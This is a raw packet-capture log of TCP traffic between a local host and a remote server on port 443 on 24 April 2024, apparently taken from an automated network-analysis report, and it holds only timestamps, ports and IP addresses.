                                                                                                                              Apr 24, 2024 06:48:16.915872097 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.918196917 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.918211937 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.918292999 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.918320894 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.918381929 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.920952082 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.920968056 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.921053886 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.921075106 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.921135902 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.924417973 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.924439907 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.924535990 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.924552917 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.924609900 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.926913977 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.926930904 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.927011013 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.927026033 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.927087069 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.929745913 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.929761887 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.929837942 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.929852962 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.929907084 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.932482004 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.932507992 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.932580948 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.932596922 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.932655096 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.935920000 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.935942888 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.936019897 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.936036110 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.936093092 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.938883066 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.938899994 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.938980103 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.938993931 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.939050913 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.941384077 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.941400051 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.941621065 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:16.941634893 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:16.941695929 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.025546074 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.025572062 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.025722027 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.025768995 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.025840044 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.028311968 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.028330088 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.028403997 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.028418064 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.028465986 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.031441927 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.031457901 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.031523943 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.031536102 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.031591892 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.034235954 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.034250975 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.034323931 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.034337044 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.034389973 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.037354946 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.037379026 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.037435055 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.037450075 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.037487030 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.037487030 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.040111065 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.040126085 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.040239096 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.040251970 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.040323019 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.043411970 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.043431044 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.043503046 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.043514967 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.043560028 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.045572042 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.045593023 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.045655012 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.045667887 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.045715094 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.048877001 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.048897028 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.048970938 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.048989058 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.049041033 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.051687956 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.051703930 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.051773071 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.051784992 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.051836967 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.054204941 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.054222107 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.054282904 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.054295063 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.054341078 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.057399035 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.057415962 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.057481050 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.057493925 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.057543039 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.060419083 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.060435057 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.060503960 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.060516119 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.060565948 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.063065052 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.063080072 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.063138962 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.063150883 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.063200951 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.066684008 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.066699028 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.066765070 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.066778898 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.066832066 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.068479061 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.068496943 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.068561077 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.068573952 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.068620920 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.071882010 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.071899891 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.071974039 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.071985960 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.072035074 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.074935913 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.074951887 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.075021982 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.075033903 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.075083017 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.079137087 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.079157114 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.079229116 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.079247952 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.079297066 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.080732107 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.080748081 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.080811977 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.080823898 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.080878973 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.083415031 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.083431005 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.083493948 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.083507061 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.083555937 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.085992098 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.086016893 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.086082935 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.086095095 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.086143017 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.089103937 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.089118958 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.089202881 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.089214087 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.089265108 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.092221975 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.092246056 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.094770908 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.094841957 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.097569942 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.100231886 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.100255013 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.100301027 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.100377083 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.102883101 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.102915049 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.102962017 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.102967024 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.102984905 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.103004932 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.105374098 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.105392933 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.105454922 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.105458975 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.105500937 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.107768059 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.107784986 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.107866049 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.107870102 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.107906103 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.110631943 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.110650063 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.110723972 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.110730886 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.110764027 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.113360882 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.113378048 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.113454103 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.113459110 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.113500118 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.115490913 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.115509033 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.115580082 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.115586996 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.115626097 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.117844105 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.117862940 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.117928982 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.117934942 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.117978096 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.120753050 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.120773077 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.120835066 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.120841026 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.120882034 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.123152971 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.123178005 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.123239994 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.123245955 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.123282909 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.125592947 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.125617027 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.125678062 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.125683069 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.125718117 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.128057957 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.128072977 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.128139019 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.128143072 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.128181934 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.131007910 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.131026983 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.131109953 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.131114960 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.131155968 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.133368969 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.133383036 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.133440971 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.133446932 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.133503914 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.135782003 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.135797024 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.135857105 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.135863066 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.135902882 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.138164043 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.138179064 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.138236046 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.138242006 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.138277054 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.141180992 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.141196966 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.141367912 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.141375065 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.141410112 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.143595934 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.143610001 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.143677950 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.143682957 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.143718958 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.145997047 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.146039009 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.146066904 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.146073103 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.146105051 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.146125078 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.149048090 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.149085045 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.149122953 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.149127960 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.149153948 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.149178982 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.151500940 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.151530027 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.151572943 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.151580095 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.151595116 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.151617050 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.153749943 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.153769970 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.153824091 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.153831959 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.153871059 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.156083107 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.156109095 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.156160116 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.156168938 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.156209946 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.159018993 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.159035921 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.159090996 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.159099102 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.159135103 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.161465883 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.161483049 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.161537886 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.161545038 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.161581039 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.163861990 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.163878918 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.163942099 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.163949013 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.163990021 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.166552067 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.166598082 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.166630983 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.166645050 CEST44349705172.67.215.45192.168.2.5
                                                                                                                              Apr 24, 2024 06:48:17.166673899 CEST49705443192.168.2.5172.67.215.45
                                                                                                                              Apr 24, 2024 06:48:17.166692972 CEST49705443192.168.2.5172.67.215.45
